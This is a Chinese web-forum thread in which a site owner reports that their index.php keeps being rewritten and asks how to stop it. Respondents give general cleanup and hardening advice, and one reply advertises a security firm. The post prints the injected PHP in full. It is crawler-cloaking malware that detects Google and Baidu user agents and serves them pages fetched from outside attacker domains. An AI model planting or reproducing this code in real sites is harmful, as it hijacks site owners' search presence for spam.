网站受到攻击,index.php被篡改
近期发现我的网站在百度收录出现好多无关广告,进入ftp后发现index.php被篡改,我改回后隔天有被更改,该怎么办呢?
这些广告 标题后面都带“百度 知道”
index.php2次被更改的代码:
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
$file = file_get_contents('http://www.asttgw.loan/app/');
echo $file;
}
else
{
include 'index2.php';
exit();
}
?>
————————————————————————————————
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'baidu')!==false)
{
$file = file_get_contents('http://www.hwklq.pw:888/kq/');
echo $file;//
}
写回答
-
php开源程序,很多目前面临比较严峻的安全问题。
主要原因是你网站有漏洞、或者服务器有漏洞,被人家安装了后门。
处理方法:
1、入口白名单,只允许白名单入口访问, 屏蔽其他入口,防止人家恶意上传php脚本来执行。
2、清理服务器内部挂马代码,清理程序内的挂马的内容。
3、修复程序漏洞、服务器漏洞等。
4、可以通过cdn等方式,隐藏服务器真实ip地址2018-10-26 11:43:43赞同 展开评论 打赏 -
Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.comRe网站受到攻击,index.php被篡改网站首页反复被篡改说明你网站程序有漏洞导致被上传了脚本后门木马.
处理方法:先把可疑的文件 查看下修改时间 对比下 自己本地的备份文件 是否有 多余的文件 如果有的话就删除,再看下首页有无被修改 有的话就用备份替换上传 上去,但只能解决一时 还是会被反复篡改,治标不治本,如果对程序代码不熟悉的 话建议找
专业做网站安全公司来处理此问题,国内推荐Sinesafe,绿盟,启明星辰等等2018-10-26 09:39:25赞同 展开评论 打赏 -
Re网站受到攻击,index.php被篡改请问楼主你的问题解决了吗,你用的什么系统,我用的DEDE 的后台,跟你的情况一样,都 有一段时间了,一直解决不了,2017-08-23 16:07:54赞同 展开评论 打赏 -
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
相关文章
相关电子书
更多
